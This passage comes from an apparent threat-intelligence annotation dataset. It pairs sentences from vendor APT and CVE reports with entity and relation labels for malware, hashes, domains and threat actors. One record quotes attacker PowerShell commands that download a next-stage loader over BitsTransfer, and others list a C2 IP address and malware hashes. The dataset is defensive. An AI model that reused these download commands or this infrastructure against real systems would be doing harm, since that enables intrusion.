instances, due to improper permissions in support scripts.","entities":[{"id":49592,"label":"attack-pattern","start_offset":21,"end_offset":41},{"id":49593,"label":"SOFTWARE","start_offset":59,"end_offset":128},{"id":49591,"label":"vulnerability","start_offset":1,"end_offset":15}],"relations":[{"id":839,"from_id":49591,"to_id":49592,"type":"uses"},{"id":840,"from_id":49593,"to_id":49591,"type":"has"}],"Comments":[]} {"id":3766,"text":" Attackers can, therefore, leverage CVE-2022-22954 to remotely execute commands to overwrite specific paths.","entities":[{"id":49598,"label":"attack-pattern","start_offset":83,"end_offset":107},{"id":49596,"label":"vulnerability","start_offset":36,"end_offset":50},{"id":49597,"label":"attack-pattern","start_offset":54,"end_offset":79}],"relations":[{"id":842,"from_id":49596,"to_id":49597,"type":"uses"},{"id":843,"from_id":49596,"to_id":49598,"type":"uses"}],"Comments":[]} {"id":3768,"text":" Our research so far has shown one publicly known sample demonstrating exploitation of CVE-2022-22960 by overwriting the \/usr\/local\/horizon\/scripts\/publishCaCert.hzn file.","entities":[{"id":49600,"label":"vulnerability","start_offset":87,"end_offset":101},{"id":49601,"label":"FILEPATH","start_offset":121,"end_offset":165}],"relations":[{"id":841,"from_id":49601,"to_id":49600,"type":"related-to"}],"Comments":[]} {"id":3781,"text":" Mirai\/Gafgyt dropper scripts or variants Perl Shellbot Coinminer activity Webshell downloads (full injected command) Callback\/Scanning activity Direct Download exploits where payloads were no longer live at the time of analysis: Sample hashes 801b23bffa65facee1da69bc6f72f8e1e4e1aeefc63dfd3a99b238d4f9d0a637 6d403c3fc246d6d493a6f4acc18c1c292f710db6ad9c3ea2ff065595c5ad3c5b 940a674cfe8179b2b8964bf408037e0e5a5ab7e47354fe4fa7a9289732e1f1b8 fdc94d0dedf6e53dd435d2b5eacb4c34923fadee50529db6f3de38c71f325e05 85143ecc41fb6aadd822ed2d6f20c721a83ae1088f406f29b8b0b05459053a03 bot.v 0b4b25fab4c922e752e689111f38957e0402fd83f6b1d69e8f43c6f4b68fc1ba C2 server : 5[.]39.217.212:80","entities":[{"id":11449,"label":"malware","start_offset":58,"end_offset":67},{"id":11452,"label":"SHA2","start_offset":251,"end_offset":315},{"id":11453,"label":"SHA2","start_offset":316,"end_offset":380},{"id":11454,"label":"SHA2","start_offset":381,"end_offset":445},{"id":11455,"label":"SHA2","start_offset":446,"end_offset":510},{"id":11456,"label":"SHA2","start_offset":511,"end_offset":575},{"id":11457,"label":"SHA2","start_offset":583,"end_offset":647},{"id":49619,"label":"IPV4","start_offset":660,"end_offset":677},{"id":49620,"label":"malware","start_offset":1,"end_offset":21}],"relations":[{"id":845,"from_id":11453,"to_id":49620,"type":"indicates"},{"id":844,"from_id":11452,"to_id":49620,"type":"indicates"},{"id":846,"from_id":11454,"to_id":49620,"type":"indicates"},{"id":847,"from_id":11455,"to_id":49620,"type":"indicates"},{"id":848,"from_id":11456,"to_id":49620,"type":"indicates"},{"id":849,"from_id":11457,"to_id":49620,"type":"indicates"},{"id":850,"from_id":49620,"to_id":49619,"type":"communicates-with"}],"Comments":[]} {"id":3788,"text":"At the time, we found ChessMaster targeting different sectors from the academe to media and government agencies in Japan.","entities":[{"id":49628,"label":"campaign","start_offset":22,"end_offset":33},{"id":49629,"label":"identity","start_offset":71,"end_offset":111},{"id":49630,"label":"location","start_offset":115,"end_offset":120}],"relations":[{"id":851,"from_id":49628,"to_id":49629,"type":"targets"},{"id":852,"from_id":49629,"to_id":49630,"type":"located-at"}],"Comments":[]} {"id":3791,"text":" While the original campaign was comprehensive and used remote access Trojans (RATs) such as ChChes and RedLeaves, this new campaign used a new backdoor (Detected by Trend Micro as BKDR_ANEL.ZKEI) that leverages the CVE-2017-8759 vulnerability for its cyberespionage activities.","entities":[{"id":49632,"label":"malware","start_offset":93,"end_offset":99},{"id":49633,"label":"malware","start_offset":104,"end_offset":113},{"id":49634,"label":"malware","start_offset":181,"end_offset":195},{"id":49636,"label":"identity","start_offset":166,"end_offset":177},{"id":49635,"label":"vulnerability","start_offset":216,"end_offset":229}],"relations":[{"id":853,"from_id":49634,"to_id":49635,"type":"exploits"}],"Comments":[]} {"id":3798,"text":"When we tracked ChessMaster back in November, we noted that it exploited the SOAP WSDL parser vulnerability CVE-2017-8759 (patched in September 2017) within the Microsoft .NET framework to download additional malware.","entities":[{"id":49661,"label":"malware","start_offset":16,"end_offset":27},{"id":49664,"label":"TIME","start_offset":134,"end_offset":148},{"id":49666,"label":"vulnerability","start_offset":77,"end_offset":121},{"id":49662,"label":"TIME","start_offset":36,"end_offset":44},{"id":49667,"label":"SOFTWARE","start_offset":161,"end_offset":185}],"relations":[{"id":854,"from_id":49661,"to_id":49666,"type":"exploits"},{"id":855,"from_id":49667,"to_id":49666,"type":"has"}],"Comments":[]} {"id":3799,"text":"While ChessMaster still uses the previous exploit, it also added more methods to its arsenal: one exploits another vulnerability, CVE-2017-11882 (patched in November 2017), which was also exploited to deliver illegal versions of the Loki infostealer.","entities":[{"id":49668,"label":"malware","start_offset":233,"end_offset":249},{"id":49669,"label":"TIME","start_offset":157,"end_offset":170},{"id":49670,"label":"vulnerability","start_offset":130,"end_offset":144},{"id":49671,"label":"malware","start_offset":6,"end_offset":17}],"relations":[{"id":856,"from_id":49671,"to_id":49670,"type":"exploits"},{"id":857,"from_id":49670,"to_id":49668,"type":"drops"}],"Comments":[]} {"id":3810,"text":"ChessMaster can utilize any of these methods to download the next malware in the chain, the open source post-exploitation tool known as “Koadic,” which the previous campaign also used.","entities":[{"id":49682,"label":"malware","start_offset":0,"end_offset":11},{"id":49683,"label":"malware","start_offset":137,"end_offset":143}],"relations":[{"id":858,"from_id":49682,"to_id":49683,"type":"downloads"}],"Comments":[]} {"id":3830,"text":"If Koadic finds that the system is conducive to the attacker’s interests, it downloads a base64-encrypted version of the ANEL malware from the Command-and-Control (C&C) server and executes it. Encrypted ANEL is decrypted using the “certutil -docode” command.","entities":[{"id":11615,"label":"malware","start_offset":121,"end_offset":125},{"id":11618,"label":"malware","start_offset":204,"end_offset":208},{"id":49688,"label":"malware","start_offset":3,"end_offset":9}],"relations":[{"id":859,"from_id":49688,"to_id":11615,"type":"downloads"}],"Comments":[]} {"id":3833,"text":"Base64 encoded ANEL downloaded by Koadic ANEL will send the infected environment’s information to the C&C server.","entities":[{"id":49689,"label":"malware","start_offset":15,"end_offset":19},{"id":49690,"label":"malware","start_offset":34,"end_offset":40},{"id":49691,"label":"malware","start_offset":41,"end_offset":45},{"id":49692,"label":"Infrastucture","start_offset":102,"end_offset":112}],"relations":[{"id":860,"from_id":49690,"to_id":49689,"type":"downloads"},{"id":861,"from_id":49691,"to_id":49692,"type":"exfiltrates-to"}],"Comments":[]} {"id":3858,"text":"After the execution of accevent.exe, it loads event.dll, which will be placed in the same folder (so it takes loading priority), after which event.dll decrypts and loads the encrypted backdoor ssssss.ddd, which is BKDR_ANEL.","entities":[{"id":49719,"label":"FILEPATH","start_offset":141,"end_offset":150},{"id":49717,"label":"FILEPATH","start_offset":23,"end_offset":35},{"id":49718,"label":"FILEPATH","start_offset":46,"end_offset":55},{"id":49720,"label":"FILEPATH","start_offset":193,"end_offset":203},{"id":49721,"label":"malware","start_offset":214,"end_offset":223}],"relations":[{"id":862,"from_id":49717,"to_id":49718,"type":"downloads"},{"id":863,"from_id":49720,"to_id":49721,"type":"duplicate-of"}],"Comments":[]} {"id":3897,"text":"The fact sheet comes after numerous ransomware attacks on key critical infrastructures in the US and abroad, including the attack on Colonial Pipeline by DarkSide.","entities":[{"id":49749,"label":"location","start_offset":94,"end_offset":96},{"id":49751,"label":"threat-actor","start_offset":154,"end_offset":162},{"id":49750,"label":"identity","start_offset":133,"end_offset":150}],"relations":[{"id":864,"from_id":49751,"to_id":49750,"type":"targets"}],"Comments":[]} {"id":3911,"text":"Based on our investigation, the Chopper web shell is dropped via a system token, potentially via a Microsoft Exchange Server vulnerability.","entities":[{"id":49762,"label":"vulnerability","start_offset":99,"end_offset":138},{"id":49763,"label":"malware","start_offset":32,"end_offset":49}],"relations":[{"id":865,"from_id":49763,"to_id":49762,"type":"exploits"}],"Comments":[]} {"id":3912,"text":"One notable vulnerability in the Microsoft Exchange Server is CVE-2020-0688, a remote code execution bug.","entities":[{"id":49764,"label":"SOFTWARE","start_offset":33,"end_offset":58},{"id":49765,"label":"vulnerability","start_offset":62,"end_offset":75},{"id":49766,"label":"attack-pattern","start_offset":79,"end_offset":100}],"relations":[{"id":866,"from_id":49764,"to_id":49765,"type":"has"},{"id":867,"from_id":49765,"to_id":49766,"type":"uses"}],"Comments":[]} {"id":3971,"text":" As observed on CVE-2020-0688, the use of static keys — as opposed to randomly generated keys — can allow an attacker to execute arbitrary code by tricking the server into deserializing ViewState data.","entities":[{"id":49830,"label":"vulnerability","start_offset":16,"end_offset":29},{"id":49831,"label":"attack-pattern","start_offset":121,"end_offset":143}],"relations":[{"id":868,"from_id":49830,"to_id":49831,"type":"uses"}],"Comments":[]} {"id":3977,"text":"Indicators of compromise Filename Path SHA-256 Detection Notes ss.exe C:\\temp\\ ee63b49aca1495a170ea7273316385b606f3fd2df1e48e9f4de0f241d98bd055 HackTool.Win32.CATLIKE.A Vulnerability Scanner LG.exe C:\\temp\\ C:\\hp\\ 5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 HackTool.Win32.JoeWare.A. JoeWare Local Group Manipulation tool LG.dat C:\\hp\\ 5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 HackTool.Win32.JoeWare.A. JoeWare Local Group Manipulation tool mpBD6D42.dat C:\\Users C:\\Perflogs C:\\hp C:\\temp e9be71848d1faa0c41db4c6a1e901747d98fb0b3cca027f8be85ea5e339b75e3 HackTool.MSIL.Mimikatz.AF Mimikatz Tags Endpoints | APT & Targeted Attacks | Research | Network | Articles, News, Reports","entities":[{"id":12061,"label":"SHA2","start_offset":227,"end_offset":291},{"id":12063,"label":"SHA2","start_offset":375,"end_offset":439},{"id":12060,"label":"SHA2","start_offset":87,"end_offset":151},{"id":12066,"label":"tools","start_offset":650,"end_offset":658},{"id":12065,"label":"SHA2","start_offset":557,"end_offset":621},{"id":49840,"label":"FILEPATH","start_offset":202,"end_offset":208},{"id":49845,"label":"malware","start_offset":623,"end_offset":648},{"id":49847,"label":"FILEPATH","start_offset":367,"end_offset":373},{"id":49848,"label":"FILEPATH","start_offset":507,"end_offset":519},{"id":49849,"label":"FILEPATH","start_offset":521,"end_offset":541},{"id":49850,"label":"FILEPATH","start_offset":542,"end_offset":555},{"id":49837,"label":"FILEPATH","start_offset":69,"end_offset":75},{"id":49842,"label":"FILEPATH","start_offset":219,"end_offset":225},{"id":49838,"label":"FILEPATH","start_offset":77,"end_offset":85},{"id":49839,"label":"malware","start_offset":153,"end_offset":177},{"id":49841,"label":"FILEPATH","start_offset":210,"end_offset":218},{"id":49843,"label":"malware","start_offset":293,"end_offset":317},{"id":49844,"label":"malware","start_offset":441,"end_offset":465},{"id":49846,"label":"FILEPATH","start_offset":359,"end_offset":365}],"relations":[{"id":869,"from_id":12060,"to_id":49839,"type":"indicates"},{"id":870,"from_id":49838,"to_id":49839,"type":"indicates"},{"id":871,"from_id":49837,"to_id":49839,"type":"indicates"},{"id":872,"from_id":12061,"to_id":49843,"type":"indicates"},{"id":873,"from_id":49842,"to_id":49843,"type":"indicates"},{"id":874,"from_id":49841,"to_id":49843,"type":"indicates"},{"id":875,"from_id":49840,"to_id":49843,"type":"indicates"},{"id":876,"from_id":49846,"to_id":49844,"type":"indicates"},{"id":877,"from_id":49847,"to_id":49844,"type":"indicates"},{"id":878,"from_id":12063,"to_id":49844,"type":"indicates"},{"id":879,"from_id":49848,"to_id":49845,"type":"indicates"},{"id":880,"from_id":49849,"to_id":49845,"type":"indicates"},{"id":881,"from_id":49850,"to_id":49845,"type":"indicates"},{"id":882,"from_id":12065,"to_id":49845,"type":"indicates"}],"Comments":[]} {"id":4015,"text":"Earth Centaur, previously known as Tropic Trooper, is a long-running cyberespionage threat group that has been active since 2011.","entities":[{"id":49866,"label":"TIME","start_offset":118,"end_offset":128},{"id":49865,"label":"threat-actor","start_offset":35,"end_offset":49},{"id":49864,"label":"threat-actor","start_offset":0,"end_offset":13}],"relations":[{"id":883,"from_id":49864,"to_id":49865,"type":"duplicate-of"}],"Comments":[]} {"id":4030,"text":" We found that the threat actors used vulnerable Internet Information Services (IIS) server and Exchange server vulnerabilities as entry points, and then installed web shells.","entities":[{"id":49871,"label":"vulnerability","start_offset":96,"end_offset":127},{"id":49872,"label":"vulnerability","start_offset":38,"end_offset":91},{"id":49873,"label":"attack-pattern","start_offset":164,"end_offset":174}],"relations":[{"id":884,"from_id":49872,"to_id":49873,"type":"uses"},{"id":885,"from_id":49871,"to_id":49873,"type":"uses"}],"Comments":[]} {"id":4031,"text":"Afterward, the .NET loader (detected as Nerapack) and the first stage backdoor (Quasar remote administration tool aka Quasar RAT) were deployed on the compromised machine.","entities":[{"id":49875,"label":"malware","start_offset":80,"end_offset":113},{"id":49874,"label":"malware","start_offset":40,"end_offset":48},{"id":49876,"label":"malware","start_offset":118,"end_offset":128}],"relations":[{"id":887,"from_id":49875,"to_id":49876,"type":"duplicate-of"},{"id":888,"from_id":49874,"to_id":49876,"type":"delivers"}],"Comments":[]} {"id":4037,"text":"After the threat actors get access to the vulnerable hosts by using ProxyLogon exploits and web shells, they use bitsadmin to download the next-stage loader (loaders are detected as Nerapack) as well as its payload file (.bin). C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -Command \"&{Import-Module BitsTransfer; Start-BitsTransfer 'http:\/\/:8000\/dfmanager.exe' \"%temp%\/dfmanager.exe\"}\" C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -Command \"&{Import-Module BitsTransfer; Start-BitsTransfer 'http:\/\/:8000\/dfmanager.bin' \"C:\\Users\\\\AppData\\Local\\Temp\/dfmanager.bin\"}\"","entities":[{"id":49882,"label":"attack-pattern","start_offset":92,"end_offset":102},{"id":49888,"label":"FILEPATH","start_offset":385,"end_offset":405},{"id":49891,"label":"URL","start_offset":566,"end_offset":618},{"id":49889,"label":"FILEPATH","start_offset":409,"end_offset":466},{"id":49883,"label":"tools","start_offset":113,"end_offset":122},{"id":49884,"label":"malware","start_offset":182,"end_offset":190},{"id":49885,"label":"threat-actor","start_offset":10,"end_offset":23},{"id":49886,"label":"FILEPATH","start_offset":228,"end_offset":285},{"id":49887,"label":"URL","start_offset":346,"end_offset":382},{"id":49881,"label":"vulnerability","start_offset":68,"end_offset":87},{"id":49890,"label":"URL","start_offset":527,"end_offset":563}],"relations":[{"id":889,"from_id":49885,"to_id":49881,"type":"exploits"},{"id":890,"from_id":49885,"to_id":49882,"type":"uses"},{"id":891,"from_id":49885,"to_id":49883,"type":"uses"},{"id":892,"from_id":49883,"to_id":49884,"type":"downloads"}],"Comments":[]} {"id":4082,"text":"During our investigation into Earth Centaurs activities, we found that it also uses another backdoor called Lilith RAT.","entities":[{"id":49916,"label":"threat-actor","start_offset":30,"end_offset":44},{"id":49917,"label":"malware","start_offset":108,"end_offset":118}],"relations":[{"id":893,"from_id":49916,"to_id":49917,"type":"uses"}],"Comments":[]} {"id":4165,"text":"Based on these special mutex strings, we believe the threat actors come from a Chinese-speaking region.","entities":[{"id":49970,"label":"threat-actor","start_offset":53,"end_offset":66},{"id":49971,"label":"location","start_offset":79,"end_offset":102}],"relations":[{"id":894,"from_id":49970,"to_id":49971,"type":"located-at"}],"Comments":[]} {"id":4167,"text":"After analyzing the ChiserClient, we found that it shares a similar style of network configuration to the TClient mentioned in our previous research on Earth Centaur.","entities":[{"id":12514,"label":"malware","start_offset":20,"end_offset":32},{"id":12515,"label":"malware","start_offset":106,"end_offset":113},{"id":49972,"label":"threat-actor","start_offset":152,"end_offset":166}],"relations":[{"id":895,"from_id":12515,"to_id":49972,"type":"authored-by"},{"id":896,"from_id":12514,"to_id":49972,"type":"authored-by"}],"Comments":[]} {"id":4171,"text":"After checking the backdoor SmileSvr, we found that there was a code similarity between it and Troj_YAHAMAM, which was used by Earth Centaur in an earlier operation.","entities":[{"id":49973,"label":"malware","start_offset":95,"end_offset":107},{"id":49974,"label":"threat-actor","start_offset":127,"end_offset":140}],"relations":[{"id":897,"from_id":49974,"to_id":49973,"type":"uses"}],"Comments":[]} {"id":4204,"text":"Back in February, we noted the similarities between the Patchwork and Confucius groups and found that, in addition to the similarities in their malware code, both groups primarily went after targets in South Asia.","entities":[{"id":50016,"label":"threat-actor","start_offset":70,"end_offset":79},{"id":50014,"label":"TIME","start_offset":8,"end_offset":16},{"id":50015,"label":"threat-actor","start_offset":56,"end_offset":65},{"id":50017,"label":"location","start_offset":202,"end_offset":212}],"relations":[{"id":898,"from_id":50015,"to_id":50016,"type":"related-to"},{"id":899,"from_id":50015,"to_id":50017,"type":"targets"},{"id":900,"from_id":50016,"to_id":50017,"type":"targets"},{"id":901,"from_id":50016,"to_id":50015,"type":"related-to"}],"Comments":[]} {"id":4205,"text":"During the months that followed in which we tracked Confucius’ activities, we found that they were still aiming for Pakistani targets.","entities":[{"id":50019,"label":"location","start_offset":116,"end_offset":125},{"id":50018,"label":"threat-actor","start_offset":52,"end_offset":61}],"relations":[{"id":902,"from_id":50018,"to_id":50019,"type":"targets"}],"Comments":[]} {"id":4242,"text":"We already mentioned that Confucius had possible links to other groups in our previous blog post, which mentioned code sharing between Patchwork and Confucius.","entities":[{"id":50045,"label":"threat-actor","start_offset":26,"end_offset":35},{"id":50046,"label":"threat-actor","start_offset":135,"end_offset":144},{"id":50047,"label":"threat-actor","start_offset":149,"end_offset":158}],"relations":[{"id":903,"from_id":50046,"to_id":50047,"type":"related-to"}],"Comments":[]} {"id":4244,"text":"We found more code shared among the two threat actor’s malware, as Patchwork recently used multiple Delphi malware similar to some of the Delphi malware we described before.","entities":[{"id":50049,"label":"malware","start_offset":138,"end_offset":152},{"id":50050,"label":"malware","start_offset":100,"end_offset":114},{"id":50048,"label":"threat-actor","start_offset":67,"end_offset":76}],"relations":[{"id":904,"from_id":50048,"to_id":50050,"type":"uses"},{"id":905,"from_id":50049,"to_id":50050,"type":"duplicate-of"}],"Comments":[]} {"id":4249,"text":"Figure 6: Decompiled Form structure of Confucius’ sample (d971842441c83c1bba05742d124620f5741bb5d5da9ffb31f06efa4bbdcf04ee, Detected as TSPY_CONFSTEAL.A) Figure 7:","entities":[{"id":50051,"label":"SHA2","start_offset":58,"end_offset":122},{"id":50052,"label":"malware","start_offset":136,"end_offset":152}],"relations":[{"id":906,"from_id":50051,"to_id":50052,"type":"indicates"}],"Comments":[]} {"id":4250,"text":"Decompiled Form structure of Patchwork’s sample (795ae4097aa3bd5932be4110f6bd992f46d605d4c9e3afced314454d35395a59, Detected as TROJ_DELF.XXWZ)","entities":[{"id":12743,"label":"threat-actor","start_offset":29,"end_offset":38},{"id":12745,"label":"SHA2","start_offset":49,"end_offset":113},{"id":50053,"label":"malware","start_offset":127,"end_offset":141}],"relations":[{"id":907,"from_id":12745,"to_id":50053,"type":"indicates"},{"id":908,"from_id":12743,"to_id":50053,"type":"uses"}],"Comments":[]} {"id":4264,"text":"Interestingly, one of those keys, “xldbszcd”, was found in a file stealer used by Confucius (472ea4929c5e0fb4e29597311ed90a14c57bc67fbf26f81a3aac042aa3dccb55, Detected as TSPY_CONFSTEAL.A) as well as in two other file stealers.","entities":[{"id":50061,"label":"SHA2","start_offset":93,"end_offset":157},{"id":50062,"label":"malware","start_offset":171,"end_offset":187},{"id":50060,"label":"threat-actor","start_offset":82,"end_offset":91}],"relations":[{"id":909,"from_id":50061,"to_id":50062,"type":"indicates"},{"id":910,"from_id":50060,"to_id":50062,"type":"uses"}],"Comments":[]} {"id":4265,"text":"One file stealer (cca74bb322ad7833a21209b1418c9837e30983daec30d199a839f46075ee72f2, Detected as TSPY_DELF.SUW) published by security researchers in 2013 and linked to the domain myflatnet[.]com, was attributed by several parties to the Hangover group.","entities":[{"id":50067,"label":"threat-actor","start_offset":236,"end_offset":250},{"id":50063,"label":"SHA2","start_offset":18,"end_offset":82},{"id":50064,"label":"malware","start_offset":96,"end_offset":109},{"id":50065,"label":"TIME","start_offset":148,"end_offset":152},{"id":50066,"label":"DOMAIN","start_offset":178,"end_offset":193}],"relations":[{"id":911,"from_id":50063,"to_id":50064,"type":"indicates"},{"id":912,"from_id":50064,"to_id":50066,"type":"communicates-with"},{"id":913,"from_id":50064,"to_id":50067,"type":"attributed-to"}],"Comments":[]} {"id":4266,"text":"The other file stealer (1f0dabd61947b6df8a392b77a0eae33777be3caad13698aecc223b54ab4b859a, Detected as TROJ_DELF.XXWZ) is related to a domain reported in September 2016.","entities":[{"id":50069,"label":"malware","start_offset":102,"end_offset":116},{"id":50070,"label":"TIME","start_offset":153,"end_offset":167},{"id":50068,"label":"SHA2","start_offset":24,"end_offset":88}],"relations":[{"id":914,"from_id":50068,"to_id":50069,"type":"indicates"}],"Comments":[]} {"id":4277,"text":"The dropped payloads are modified versions of the Remote Administration Tool QuasarRAT that can be traced to the domains sastind-cn[.]org and tautiaos[.]com.","entities":[{"id":50080,"label":"DOMAIN","start_offset":142,"end_offset":156},{"id":50078,"label":"malware","start_offset":77,"end_offset":86},{"id":50079,"label":"DOMAIN","start_offset":121,"end_offset":137}],"relations":[{"id":915,"from_id":50078,"to_id":50079,"type":"communicates-with"},{"id":916,"from_id":50078,"to_id":50080,"type":"communicates-with"}],"Comments":[]} {"id":4286,"text":"The group still uses the Badnews malware, a backdoor with information-stealing and file-executing capabilities, albeit updated with a slight modification in the encryption routine at the end of 2017, when they added Blowfish encryption on top of their custom encryption described in our former Patchwork blogpost.","entities":[{"id":50084,"label":"malware","start_offset":25,"end_offset":40},{"id":50085,"label":"attack-pattern","start_offset":58,"end_offset":78},{"id":50086,"label":"attack-pattern","start_offset":83,"end_offset":97},{"id":50087,"label":"TIME","start_offset":187,"end_offset":198},{"id":50088,"label":"threat-actor","start_offset":294,"end_offset":303}],"relations":[{"id":917,"from_id":50084,"to_id":50085,"type":"uses"},{"id":918,"from_id":50084,"to_id":50086,"type":"uses"}],"Comments":[]} {"id":4356,"text":"It should be noted that in some occasions, the threat actor sent spear-phishing emails from the domain name mailerservice[.]directory which we attributed to the Patchwork threat actor in previous research.","entities":[{"id":50138,"label":"attack-pattern","start_offset":65,"end_offset":79},{"id":50139,"label":"DOMAIN","start_offset":108,"end_offset":133},{"id":50140,"label":"threat-actor","start_offset":161,"end_offset":170}],"relations":[{"id":919,"from_id":50139,"to_id":50140,"type":"attributed-to"}],"Comments":[]} {"id":4367,"text":"Trend Micro™ Deep Discovery™ Email Inspector – Defends users through a combination of real-time scanning and advanced analysis techniques for known and unknown attacks. Indicators of Compromise Hashes of the malicious encrypted documents: SHA256 Detection name dacf7868a71440a7d7d8797caca1aa29b7780801e6f3b3bc33123f16989354b2 Trojan.W97M.CONFUCIUS.A 0f6bcbdf4d192f8273887f9858819dd4690397a92fb28a60bb731c873c438e07 Trojan.W97M.CONFUCIUS.B","entities":[{"id":50153,"label":"malware","start_offset":428,"end_offset":451},{"id":50149,"label":"SOFTWARE","start_offset":0,"end_offset":28},{"id":50150,"label":"SHA2","start_offset":271,"end_offset":335},{"id":50151,"label":"malware","start_offset":337,"end_offset":360},{"id":50152,"label":"SHA2","start_offset":362,"end_offset":426}],"relations":[{"id":920,"from_id":50150,"to_id":50151,"type":"indicates"},{"id":921,"from_id":50152,"to_id":50153,"type":"indicates"}],"Comments":[]} {"id":4369,"text":" Trojan.W97M.CONFUCIUS.B 654c7021a4482da21e149ded58643b279ffbce66badf1a0a7fc3551acd607312 Trojan.W97M.CONFUCIUS.C 712172b5b1895bbfcced961a83baa448e26e93e301be407e6b9dc8cb6526277f Trojan.Win32.DLOADR.TIOIBELQ","entities":[{"id":13099,"label":"SHA2","start_offset":26,"end_offset":90},{"id":13100,"label":"SHA2","start_offset":117,"end_offset":181},{"id":50154,"label":"malware","start_offset":1,"end_offset":24},{"id":50155,"label":"malware","start_offset":92,"end_offset":115},{"id":50156,"label":"malware","start_offset":183,"end_offset":211}],"relations":[{"id":922,"from_id":13099,"to_id":50154,"type":"indicates"},{"id":923,"from_id":13100,"to_id":50155,"type":"indicates"}],"Comments":[]} {"id":4373,"text":"As part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats including APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users.","entities":[{"id":50174,"label":"identity","start_offset":11,"end_offset":14},{"id":50178,"label":"identity","start_offset":162,"end_offset":180},{"id":50175,"label":"identity","start_offset":55,"end_offset":61},{"id":50176,"label":"threat-actor","start_offset":132,"end_offset":137},{"id":50177,"label":"threat-actor","start_offset":142,"end_offset":157}],"relations":[{"id":924,"from_id":50177,"to_id":50178,"type":"attributed-to"},{"id":925,"from_id":50176,"to_id":50177,"type":"duplicate-of"}],"Comments":[]} {"id":4376,"text":"In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.","entities":[{"id":13122,"label":"threat-actor","start_offset":41,"end_offset":56},{"id":50182,"label":"TIME","start_offset":3,"end_offset":16},{"id":50183,"label":"identity","start_offset":18,"end_offset":21},{"id":50188,"label":"attack-pattern","start_offset":90,"end_offset":105},{"id":50186,"label":"SOFTWARE","start_offset":118,"end_offset":124},{"id":50184,"label":"malware","start_offset":69,"end_offset":80},{"id":50185,"label":"SOFTWARE","start_offset":111,"end_offset":116},{"id":50187,"label":"SOFTWARE","start_offset":130,"end_offset":147}],"relations":[{"id":926,"from_id":50184,"to_id":13122,"type":"authored-by"},{"id":927,"from_id":50184,"to_id":50188,"type":"uses"},{"id":928,"from_id":50184,"to_id":50185,"type":"targets"},{"id":929,"from_id":50184,"to_id":50186,"type":"targets"},{"id":930,"from_id":50184,"to_id":50187,"type":"targets"}],"Comments":[]} {"id":4383,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten’s objectives.","entities":[{"id":50196,"label":"malware","start_offset":28,"end_offset":39},{"id":50197,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[{"id":931,"from_id":50197,"to_id":50196,"type":"uses"}],"Comments":[]} {"id":4450,"text":"Our Threat Analysis Group, or TAG, is dedicated to protecting users from threats posed by state-sponsored malware attacks and other advanced persistent threats.","entities":[{"id":50226,"label":"identity","start_offset":4,"end_offset":25},{"id":50227,"label":"identity","start_offset":30,"end_offset":33}],"relations":[{"id":932,"from_id":50227,"to_id":50226,"type":"duplicate-of"}],"Comments":[]} {"id":4459,"text":"In 2017, Android – which is owned by Google – was the first mobile platform to warn users about NSO Group’s Pegasus spyware.","entities":[{"id":50241,"label":"malware","start_offset":108,"end_offset":115},{"id":50237,"label":"TIME","start_offset":3,"end_offset":7},{"id":50240,"label":"threat-actor","start_offset":96,"end_offset":105},{"id":50238,"label":"SOFTWARE","start_offset":9,"end_offset":16},{"id":50239,"label":"identity","start_offset":37,"end_offset":43}],"relations":[{"id":933,"from_id":50241,"to_id":50240,"type":"authored-by"}],"Comments":[]} {"id":4460,"text":"At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android devices.","entities":[{"id":50243,"label":"malware","start_offset":102,"end_offset":109},{"id":50244,"label":"SOFTWARE","start_offset":166,"end_offset":173},{"id":50245,"label":"identity","start_offset":17,"end_offset":29}],"relations":[{"id":934,"from_id":50243,"to_id":50244,"type":"targets"}],"Comments":[]} {"id":4471,"text":"For example, TAG discovered campaigns targeting Armenian users which utilized zero-day vulnerabilities in Chrome and Internet Explorer.","entities":[{"id":50266,"label":"campaign","start_offset":28,"end_offset":37},{"id":50261,"label":"identity","start_offset":13,"end_offset":16},{"id":50265,"label":"SOFTWARE","start_offset":117,"end_offset":134},{"id":50262,"label":"location","start_offset":48,"end_offset":56},{"id":50263,"label":"vulnerability","start_offset":78,"end_offset":102},{"id":50264,"label":"SOFTWARE","start_offset":106,"end_offset":112}],"relations":[{"id":935,"from_id":50266,"to_id":50262,"type":"targets"},{"id":936,"from_id":50266,"to_id":50263,"type":"exploits"},{"id":937,"from_id":50264,"to_id":50263,"type":"has"},{"id":938,"from_id":50265,"to_id":50263,"type":"has"}],"Comments":[]} {"id":4473,"text":"Reporting by CitizenLab linked this activity to Candiru, an Israeli spyware vendor.","entities":[{"id":50267,"label":"identity","start_offset":13,"end_offset":23},{"id":50268,"label":"threat-actor","start_offset":48,"end_offset":55},{"id":50269,"label":"location","start_offset":60,"end_offset":67}],"relations":[{"id":939,"from_id":50268,"to_id":50269,"type":"located-at"}],"Comments":[]} {"id":4475,"text":"Most recently, we reported in May on five zero-day vulnerabilities affecting Chrome and Android which were used to compromise Android users.","entities":[{"id":50274,"label":"SOFTWARE","start_offset":126,"end_offset":133},{"id":50271,"label":"vulnerability","start_offset":42,"end_offset":66},{"id":50272,"label":"SOFTWARE","start_offset":77,"end_offset":83},{"id":50273,"label":"SOFTWARE","start_offset":88,"end_offset":95}],"relations":[{"id":940,"from_id":50272,"to_id":50271,"type":"has"},{"id":941,"from_id":50273,"to_id":50271,"type":"has"}],"Comments":[]} {"id":4497,"text":"The actors behind this campaign, which we attributed to a government-backed entity based in North Korea, have employed a number of means to target researchers.","entities":[{"id":50299,"label":"campaign","start_offset":23,"end_offset":31},{"id":50300,"label":"location","start_offset":92,"end_offset":103}],"relations":[{"id":942,"from_id":50299,"to_id":50300,"type":"attributed-to"}],"Comments":[]} {"id":4547,"text":"Many Russian government cyber assets have remained focused on Ukraine and related issues since the invasion began, while Russian APT activity outside of Ukraine largely remains the 